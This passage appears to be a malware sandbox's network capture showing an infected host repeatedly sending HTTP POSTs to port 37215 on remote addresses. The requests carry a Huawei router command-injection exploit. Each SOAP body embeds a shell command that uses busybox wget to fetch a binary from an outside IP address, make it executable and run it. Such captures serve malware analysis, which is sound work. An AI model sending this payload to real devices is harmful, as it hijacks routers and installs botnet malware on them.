                                                                      70192.168.2.1453584197.83.125.23337215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.641593933 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.982300997 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.482218027 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.474071980 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.458249092 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425784111 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361799955 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:36.233331919 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:08.999509096 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      71192.168.2.1453964197.79.123.10537215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.642867088 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.986116886 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
